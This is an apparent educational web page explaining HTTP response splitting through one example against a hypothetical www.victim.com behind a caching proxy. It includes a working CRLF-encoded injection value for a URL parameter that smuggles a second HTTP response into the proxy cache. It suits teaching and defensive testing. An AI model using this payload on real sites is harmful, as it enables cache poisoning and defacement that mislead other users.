Menu Search Sign up

HTTP Splitting

HTTP splitting is an attack that exploits a lack of input sanitization which allows an attacker to insert CR and LF characters into the headers of the web application response and to 'split' the HTTP response into two different HTTP responses.

Suppose the web site www.victim.com has a reverse proxy in front of the web server that caches the server’s responses to user requests. Suppose when a user visits http://www.victim.com/index.html with URL parameter interface=advanced, the request will be redirected to http://www.victim.com/main.jsp?interface=advanced:

GET http://www.victim.com/index.html?interface=advanced HTTP/1.0

 


HTTP/1.1 302 Moved Temporarily

Date: Sun, 03 Dec 2005 16:22:19 GMT

Location: http://victim.com/main.jsp?interface=advanced

When receiving this message, the browser will bring the user to the page indicated in the Location header, ie http://victim.com/main.jsp?interface=advanced.

However, if the application does not filter the user input (interface=advanced), the hacker can replace the value of the “interface” URL parameter with the following:

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a

Content-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a

<html>Sorry,%20System%20Down</html>

Where %0d%0a represents CR and LF characters. The response from the web application will be split into 2:

The 1st response:

HTTP/1.1 302 Moved Temporarily

Date: Sun, 03 Dec 2005 16:22:19 GMT

Location: http://victim.com/main.jsp?interface=advanced

Content-Length: 0

The 2nd response:

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 35

<html>Sorry,%20System%20Down</html>

When the reverse proxy caches the response, it will cache the more recent 2nd HTTP response as the response to HTTP request http://www.victim.com/index.html.

When other users visit the same URL, they will get the cached responses from the reverse proxy, which tells the users that the victim web site is down:

GET http://www.victim.com/index.html?interface=advanced HTTP/1.0

 


HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 35

<html>Sorry,%20System%20Down</html>